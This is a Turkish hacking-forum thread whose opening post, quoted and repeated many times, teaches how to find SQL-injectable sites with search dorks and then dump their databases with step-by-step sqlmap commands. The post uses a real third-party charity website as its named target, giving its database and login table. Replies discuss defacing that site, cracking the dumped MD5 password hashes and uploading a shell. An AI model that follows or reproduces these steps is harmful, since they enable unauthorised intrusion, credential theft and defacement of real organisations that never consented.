SQL Açıklı Site Hacklemek

L3N1X · 24 Tem 2023

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz

Son Hali Bu Şekilde Gözükecektir ;

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

MUTLU SON

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ

Carlonhack · 24 Tem 2023

Reis index basilirmi

L3N1X · 24 Tem 2023

Carlonhack' Alıntı:
Reis index basilirmi

Admin Panelini Bulup Giriş Yaparsan Basabilirsin ama Bu Siteye Atmanı Tavsiye Etmem Deneme Tahtamız Bu site Bizim

Carlonhack' Alıntı:
Tahtamiz ne demek

sql e yeni başlayanlar genelde bu tür eski sitelerde deniyor o yuzden önermem index atmayı

Rip_Real_World' Alıntı:
Hahaha hocam deneme tahtasına bikaç ekleme yapalım böyle fazla sade olmş :|

Yaparız hocam

takeacareofpizza' Alıntı:
ah bu site hiç şaşmaz

güzel Deneme Tahtasıdır Hocam

CH · 24 Tem 2023

Eline sağlık, yeni başlayanlar için faydalı bir içerik.

Yagami Light0 · 24 Tem 2023

Carlonhack' Alıntı:
Reis index basilirmi

o sifre diye gorunun aslinda tam sifre degildir . databaselerde sifreler genellikle hashli olur . yani admin panele o sifreyi girersen 97% hata alirsin .yani o sifre gercek sifrenin hashli versiyonudur .

Carlonhack · 24 Tem 2023

Yagami Light0' Alıntı:
o sifre diye gorunun aslinda tam sifre degildir . databaselerde sifreler genellikle hashli olur . yani admin panele o sifreyi girersen 97% hata alirsin .yani o sifre gercek sifrenin hashli versiyonudur .

Gerçek şifreyi nasıl alırız

Yagami Light0 · 24 Tem 2023

Carlonhack' Alıntı:
Gerçek şifreyi nasıl alırız

hashi cozerek

L3N1X · 24 Tem 2023

Carlonhack' Alıntı:
Nedenki atarsak ne olur

Bişiy Olmaz Ama Yeni Başlayanlar Burda Pratik Yaptığı için Önermiyorum Ama Sana Kalmış Tabi

Carlonhack' Alıntı:
Gerçek şifreyi nasıl alırız

MD5 Cracker Sitelerini Kullanabilirsin

CH' Alıntı:
Eline sağlık, yeni başlayanlar için faydalı bir içerik.

saolun hocam

takeacareofpizza · 24 Tem 2023

ah bu site hiç şaşmaz

Carlonhack' Alıntı:
Index basiliyormu

Troll olduğunu düşünüyorum fakat yinede cevap vereceğim, İndex basılabilir fakat bu site sql injectiona yeni başlayan arkadaşların üzerinde deneme yaptığı sitedir bu yüzden bir şey, bence birşey yapma fakat sana kalmış.

Rip_Real_World · 24 Tem 2023

L3N1X' Alıntı:
Admin Panelini Bulup Giriş Yaparsan Basabilirsin ama Bu Siteye Atmanı Tavsiye Etmem Deneme Tahtamız Bu site Bizim

Hahaha hocam deneme tahtasına bikaç ekleme yapalım böyle fazla sade olmş :|

HaCkEr_33 · 25 Tem 2023

L3N1X' Alıntı:
Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine
staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan
Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz
Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz
Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz
İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin
Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;
sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz

Son Hali Bu Şekilde Gözükecektir ;

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;
login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;
sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

MUTLU SON

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !
Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ

NOT: Unutmayinki herzaman sql hatasi olan her websitesinde sql acigi olmayabilir.

{ Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan }

rootibo · 25 Tem 2023

L3N1X' Alıntı:
Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine
staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan
Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz
Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz
Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz
İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin
Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;
sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz

Son Hali Bu Şekilde Gözükecektir ;

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;
login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;
sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

MUTLU SON

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !
Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ

Eline Saglik Guzel Konu

Tdark · 25 Tem 2023

Anlatım için eline sağlık mesela örneksite.com sitesinde sql açığı bulmak istiyorum bunun için bir tool var mı

Toryy · 25 Tem 2023

Sqli "tek tırnak" değildir, sqli bundan varolmaz. Anlatım eksik.

S3SS1Z T3AM · 25 Tem 2023

Keşke biraz daha detaylı araştırsanız okadar eksik var ki ...
Ayrıca sqli açığı varsa shell upload edip index basabilirsin.
Eline sağlık

Butcherb3y · 25 Tem 2023

L3N1X' Alıntı:
Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine
staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan
Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz
Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz
Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz
İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin
Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;
sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz

Son Hali Bu Şekilde Gözükecektir ;

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;
login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;
sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

MUTLU SON

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !
Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ

Konu güzel olmuş elinize sağlık

takeacareofpizza · 25 Tem 2023

Tdark' Alıntı:
Anlatım için eline sağlık mesela örneksite.com sitesinde sql açığı bulmak istiyorum bunun için bir tool var mı

sqlmap yada havij kullanabilirsin. Fakat sitede illaki sql açığı olmak zorunda değil

L3N1X · 25 Tem 2023

HaCkEr_33' Alıntı:
NOT: Unutmayinki herzaman sql hatasi olan her websitesinde sql acigi olmayabilir.

{ Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan }

Bilgilendirme İçin Saolun Hocam

rootibo' Alıntı:
Eline Saglik Guzel Konu

saolun hocam

Tdark' Alıntı:
Anlatım için eline sağlık mesela örneksite.com sitesinde sql açığı bulmak istiyorum bunun için bir tool var mı

Merhaba Hocam Bu Konuya Bakabilirsiniz.

Butcherb3y' Alıntı:
Konu güzel olmuş elinize sağlık

saolun hocam

Toryy' Alıntı:
Sqli "tek tırnak" değildir, sqli bundan varolmaz. Anlatım eksik.

bilgilendirme için saolun hocam

S3SS1Z T3AM' Alıntı:
Keşke biraz daha detaylı araştırsanız okadar eksik var ki ...
Ayrıca sqli açığı varsa shell upload edip index basabilirsin.
Eline sağlık

Bilgilendirme İçin Saolun Hocam

Rip_Real_World · 25 Tem 2023

HaCkEr_33' Alıntı:
NOT: Unutmayinki herzaman sql hatasi olan her websitesinde sql acigi olmayabilir.

{ Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan }

Hatayı almadıgımız sitelerdede sql açık olabilir

Blackdemon67 · 25 Tem 2023

Yıllar geçti hala aynı konular hiç mi ilerleyemedik acaba merak ettim şuan

SQL Açıklı Site Hacklemek

Üye

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz​

​

SQL AÇIĞINI BULMA :​

​

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine​

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan​

Deneyerek Kendinizi Geliştirebilirsiniz.​

​

SİTENİN DATABASE SİNİ ÇEKME : ​

​

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz ​

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz​

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.​

​

​

DATABASE İÇİNE GİRME : ​

​

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz​

​

​

​

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz​

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ; ​

​

​

TABLOLARIN İÇİNE GİRME : ​

​

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin ​

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;​

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz​

​

Yine Sorulara Y Diyoruz​

Son Hali Bu Şekilde Gözükecektir ;​

​

COLUMNS LARIN İÇİNE GİRME :​

​

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.​

​

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;​

login_id,passwort​

​

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;​

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump ​

​

Çıkan Sorulara Y Diyip Enter lıyoruz​

​

Son Hali Bu Şekilde Olacaktır ; ​

​

​

MUTLU SON ​

​

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk ​

​

​

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !​

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz​

​

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler ​

​

​

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ​

Uzman üye

Üye

Uzman üye

Katılımcı Üye

Uzman üye

Katılımcı Üye

Üye

Üye

Katılımcı Üye

Üye

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz​

​

SQL AÇIĞINI BULMA :​

​

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine​

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz ​

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan​

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz

Son Hali Bu Şekilde Gözükecektir ;

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

MUTLU SON

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ

Öncelikle Herkese Merhabalar Direk Konuya Geçelim İsterseniz

SQL AÇIĞINI BULMA :

Sql Açıklı site Bulabilmek İçin Bazı Dorkları Kullanmanız Gerekmektedir Örneğin inurl:index.php?id= Gibi Burdaki index.php yerine

staff.php,shop.php gibi şeylerde yazabilirsiniz Site Bulduk Diyelim Bu Sitede SQL Açık Olup Olmadığını Öğrenmek İçin www.website.com/index.php?id=1 url sinin sonundaki 1 in yanına ' Koyarak Öğrenebilirsiniz

Bunun Gibi Bir Hata Alırsanız Bilinki Sitemizde SQL Açığı Vardır Ben Örnek Olarak samaritermuensingen.ch Sitesini Kullandım Sizlerde Burdan

Deneyerek Kendinizi Geliştirebilirsiniz.

SİTENİN DATABASE SİNİ ÇEKME :

Evet Sitemizin Açığını Bulduğumuza Göre Artık Database sini Çekmeye Geldi Sıra Bunun İçin SQLMAP Aracını Kullanıcaz

Databasemizi Çekmek İçin Konsolumuza sqlmap -u https://web.site.com/index.php?id=1 --dbs Yazarak Taramayı Başlatıyoruz

Karışınıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz.

DATABASE İÇİNE GİRME :

Taramamız Bittikten Sonra Karşımıza Database ler Gelecektir Bunların İçine Girmek İçin İse sqlmap -u https://web.site.com/index.php?id=1 -D database_adı --tables Komutunu Kullanıcaz

Yine Aynı Şekilde Karşımıza Çıkan Y/N Sorularına Y Diyip Enter lıyoruz

İşlem Bittikten Sonra Bu Şekilde Gözükecektir ;

TABLOLARIN İÇİNE GİRME :

Burdan Sitenin Admin Username Ve Password unu Bulmak İçin login,admin,user Gibi Tablolara Giricez Burdan samu_login Olduğu İçin

Ben Bu Tablonun içine Giricem Bunu Yapmak İçin İse ;

sqlmap -u https://web.site.com/index.php?id=1 -D samariter_1 -T samu_login --columns Yazarak Tablomuzun İçine Giriyoruz

Yine Sorulara Y Diyoruz

Son Hali Bu Şekilde Gözükecektir ;

COLUMNS LARIN İÇİNE GİRME :

Evet Columns Larıda Çektiğimize Göre Sıra Kullanıcı Adını Ve Şifreyi Öğrenmeye Geldi Bazi Yerlerde Kullanıcı Adı Yerine ID ile Giriş Olabilir.

Birden Fazla Columns Açmak İçin İse login_id Yazdıktan Sonra , Koyup Passwort Yazmanız Yeterli Olacaktır Örnek Olarak Bu Şekilde ;

login_id,passwort

Bunların İçine Girmek İçin İse Şu Komutu Yazıyoruz ;

sqlmap -u Samariter Münsingen - index.php?id=2 -D samariter_1 -T samu_login -C login_id,passwort --dump

Çıkan Sorulara Y Diyip Enter lıyoruz

Son Hali Bu Şekilde Olacaktır ;

MUTLU SON

Evet Bu Şekilde Admin Kullanıcı Adımızı Ve Şifresini Bulmuş Olduk

Devamında Admin Panelini Bulup Giriş Yapmakta Admin Panel Bulmak İçin İse Bu Konuya Bakınız !

Ve Ayrıca Havij Kullanarakta Bu İşlemleri Gerçekleştirebilirsiniz

Konumuz Bu Kadardı Beni Dinlediğiniz İçin Şimdiden Teşekkürler

NOT : ŞİFRELER GENELDE MD5 ŞİFRELEME TÜRÜYLE ŞİFRELENMİŞ OLUYOR BUNU KIRMAK İÇİN İSE MD5 CRACHER SİTELERİNİ KULLANABİLİRSİNİZ